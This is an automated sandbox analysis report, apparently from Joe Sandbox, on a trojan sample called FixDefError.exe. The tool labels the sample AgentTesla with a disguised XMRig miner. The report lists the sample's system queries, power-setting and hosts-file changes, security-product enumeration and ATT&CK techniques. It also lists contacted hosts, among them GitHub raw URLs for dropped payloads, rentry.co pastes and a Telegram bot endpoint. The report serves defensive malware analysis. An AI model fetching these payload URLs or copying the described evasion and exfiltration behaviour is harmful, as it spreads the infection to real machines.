      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\ProgramData\RuntimeBrokerData\RegSvc.exe VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 00000047.00000002.516627565.0000029D68640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000047.00000002.516940028.0000029D68702000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts121
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      File and Directory Permissions Modification
      OS Credential Dumping1
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Web Service
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Command and Scripting Interpreter
      1
      Windows Service
      1
      Windows Service
      11
      Disable or Modify Tools
      LSASS Memory
      13 System Information Discovery
      Remote Desktop Protocol
      1 Clipboard Data
      Exfiltration Over Bluetooth
      1 Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts
      1 Scheduled Task/Job
      1 Scheduled Task/Job
      11 Process Injection
      1 Deobfuscate/Decode Files or Information
      Security Account Manager
      231 Security Software Discovery
      SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration
      11 Encrypted Channel
      Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts
      1 PowerShell
      Logon Script (Mac)
      1 Scheduled Task/Job
      2 Obfuscated Files or Information
      NTDS
      1 Process Discovery
      Distributed Component Object Model | Input Capture | Scheduled Transfer
      2 Non-Application Layer Protocol
      SIM Card Swap | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script
      2 Software Packing
      LSA Secrets
      131 Virtualization/Sandbox Evasion
      SSH | Keylogging | Data Transfer Size Limits
      13 Application Layer Protocol
      Manipulate Device Communication | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common
      1 Timestomp
      Cached Domain Credentials
      1 Application Window Discovery
      VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items
      1 DLL Side-Loading
      DCSync
      1 Remote System Discovery
      Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job
      1 Masquerading
      Proc Filesystem
      1 System Network Configuration Discovery
      Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux)
      131 Virtualization/Sandbox Evasion
      /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows)
      11 Process Injection
      Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
      Behavior Graph ID: 829697 | Sample: FixDefError.exe | Startdate: 19/03/2023 | Architecture: WINDOWS | Score: 100

      [node 2] Start
        DNS/IP: www.google.com; rentry.co
        Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 8 other signatures
        Started: [10] FixDefError.exe (5); [13] RegSvc.exe; [17] svchost.exe; [19] 7 other processes
      [node 10] FixDefError.exe (5)
        Dropped: C:\Users\user\AppData\...\ProgramStarter.exe, PE32; C:\Users\user\AppData\...\FixDefError.exe.log, ASCII
        Started: [21] ProgramStarter.exe (15 27)
      [node 13] RegSvc.exe
        DNS/IP: rentry.co
        Signatures: Machine Learning detection for dropped file
      [node 17] svchost.exe
        Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
      [node 19] 7 other processes
        DNS/IP: 192.168.2.1 unknown unknown
      [node 21] ProgramStarter.exe (15 27)
        DNS/IP: api4.ipify.org 104.237.62.211, 443, 49686 WEBNXUS United States; api.telegram.org 149.154.167.220, 443, 49687 TELEGRAMRU United Kingdom; 5 other IPs or domains
        Dropped: C:\ProgramData\RuntimeBrokerData\svhost.exe, PE32+; C:\ProgramData\...\WinRing0x64.sys, PE32+; C:\ProgramData\...\RuntimeBroker.exe, PE32; 2 other malicious files
        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 4 other signatures
        Started: [26] cmd.exe (1); [29] cmd.exe; [31] cmd.exe (1); [33] 14 other processes
      [node 26] cmd.exe (1)
        Signatures: Encrypted powershell cmdline option found; Uses schtasks.exe or at.exe to add and modify task schedules; Uses powercfg.exe to modify the power settings
        Started: [35] powershell.exe (22); [37] conhost.exe
      [node 29] cmd.exe
        Signatures: Modifies power options to not sleep / hibernate
        Started: [39] powercfg.exe; [49] 6 other processes
      [node 31] cmd.exe (1)
        Started: [41] conhost.exe; [43] schtasks.exe (1)
      [node 33] 14 other processes
        Started: [45] conhost.exe; [47] conhost.exe; [51] 26 other processes
      [node 39] powercfg.exe
        Started: [53] Conhost.exe

      Source | Detection | Scanner | Label | Link
      FixDefError.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
      FixDefError.exe | 39% | Virustotal | | Browse
      FixDefError.exe | 100% | Joe Sandbox ML | |

      Source | Detection | Scanner | Label | Link
      C:\ProgramData\RuntimeBrokerData\svhost.exe | 100% | Avira | HEUR/AGEN.1203240 |
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | 100% | Avira | HEUR/AGEN.1236409 |
      C:\ProgramData\RuntimeBrokerData\RegSvc.exe | 100% | Joe Sandbox ML | |
      C:\ProgramData\RuntimeBrokerData\svhost.exe | 100% | Joe Sandbox ML | |
      C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | 100% | Joe Sandbox ML | |
      C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
      C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys | 5% | ReversingLabs | |
      C:\ProgramData\RuntimeBrokerData\svhost.exe | 81% | ReversingLabs | Win64.Trojan.DisguisedXMRigMiner |
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | 31% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

      Source | Detection | Scanner | Label | Link | Download
      1.0.ProgramStarter.exe.750000.0.unpack | 100% | Avira | HEUR/AGEN.1236409 | | Download File

      Source | Detection | Scanner | Label | Link
      rentry.co | 0% | Virustotal | | Browse
      raw.githubusercontent.com | 1% | Virustotal | | Browse

      Source | Detection | Scanner | Label | Link
      http://www.sajatypeworks.com | 0% | URL Reputation | safe |
      http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
      http://www.fontbureau.comgrita | 0% | URL Reputation | safe |
      http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
      http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
      http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
      http://www.galapagosdesign.com/ | 0% | URL Reputation | safe |
      https://render.githubusercontent.com | 0% | URL Reputation | safe |
      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
      http://www.founder.com.cn/cnTF | 0% | URL Reputation | safe |
      https://go.micro | 0% | URL Reputation | safe |
      http://www.fontbureau.comicta | 0% | URL Reputation | safe |
      https://xmrig.com/wizard | 0% | URL Reputation | safe |
      https://%s.xboxlive.com | 0% | URL Reputation | safe |
      http://www.carterandcone.comn | 0% | URL Reputation | safe |
      http://www.carterandcone.coml | 0% | URL Reputation | safe |
      https://dynamic.t | 0% | URL Reputation | safe |
      https://xmrig.com/benchmark/%s | 0% | URL Reputation | safe |
      http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
      http://www.carterandcone.comams | 0% | URL Reputation | safe |
      http://www.tiro.com | 0% | URL Reputation | safe |
      http://www.goodfont.co.kr | 0% | URL Reputation | safe |
      http://www.carterandcone.com | 0% | URL Reputation | safe |
      http://www.typography.netD | 0% | URL Reputation | safe |
      http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
      http://fontfabrik.com | 0% | URL Reputation | safe |
      https://api.telegram.org4 | 0% | URL Reputation | safe |
      https://github.com4 | 0% | URL Reputation | safe |
      http://www.sandoll.co.kr | 0% | URL Reputation | safe |
      http://www.urwpp.de | 0% | URL Reputation | safe |
      http://www.sakkal.com | 0% | URL Reputation | safe |
      http://www.agfamonotype. | 0% | URL Reputation | safe |
      https://xmrig.com/wizard%s | 0% | URL Reputation | safe |
      http://www.urwpp.deF | 0% | URL Reputation | safe |
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe | 0% | Avira URL Cloud | safe |
      http://www.fontbureau.comueom8 | 0% | Avira URL Cloud | safe |
      http://www.urwpp.de- | 0% | Avira URL Cloud | safe |
      https://api.ipify.org8: | 0% | Avira URL Cloud | safe |
      https://rentry.co | 0% | Avira URL Cloud | safe |
      https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxN | 0% | Avira URL Cloud | safe |
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys | 0% | Avira URL Cloud | safe |
      https://rentry.co | 0% | Virustotal | | Browse
      https://raw.githubusercontent.com4 | 0% | Avira URL Cloud | safe |
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe | 1% | Virustotal | | Browse
      http://www.fontbureau.comgr | 0% | Avira URL Cloud | safe |
      https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw | 0% | Avira URL Cloud | safe |
      https://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
      http://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
      http://www.fontbureau.com-s | 0% | Avira URL Cloud | safe |
      http://www.tiro.comlic; | 0% | Avira URL Cloud | safe |
      http://www.fontbureau.com773. | 0% | Avira URL Cloud | safe |
      http://www.sandoll.co.kreV | 0% | Avira URL Cloud | safe |
      http://www.tiro.comu | 0% | Avira URL Cloud | safe |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      api4.ipify.org | 104.237.62.211 | true | false | | high
      github.com | 140.82.121.3 | true | false | | high
      rentry.co | 198.251.88.130 | true | false | | unknown
      raw.githubusercontent.com | 185.199.111.133 | true | false | | unknown
      www.google.com | 142.251.209.36 | true | false | | high
      api.telegram.org | 149.154.167.220 | true | false | | high
      api.ipify.org | unknown | unknown | false | | high
      Name | Malicious | Antivirus Detection | Reputation
      https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exe | false | | high
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys | false | Avira URL Cloud: safe | unknown
      https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw | false | Avira URL Cloud: safe | unknown
      https://api.ipify.org/ | false | | high
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://api.telegram.org/bot | ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.fontbureau.com/designers | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.sajatypeworks.com | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.fontbureau.comueom8 | FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.founder.com.cn/cn/cThe | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.fontbureau.comgrita | ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.galapagosdesign.com/DPlease | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://api.ipify.org8: | ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.urwpp.de- | FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
      http://www.urwpp.deDPlease | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.zhongyicts.com.cn | FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.bingmapsportal.com | svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://rentry.co | RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
      http://www.galapagosdesign.com/ | ProgramStarter.exe, 00000001.00000003.257427275.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://render.githubusercontent.com | ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000043.00000003.318697799.000001CFFD845000.00000004.00000020.00020000.00000000.sdmp | false | | high
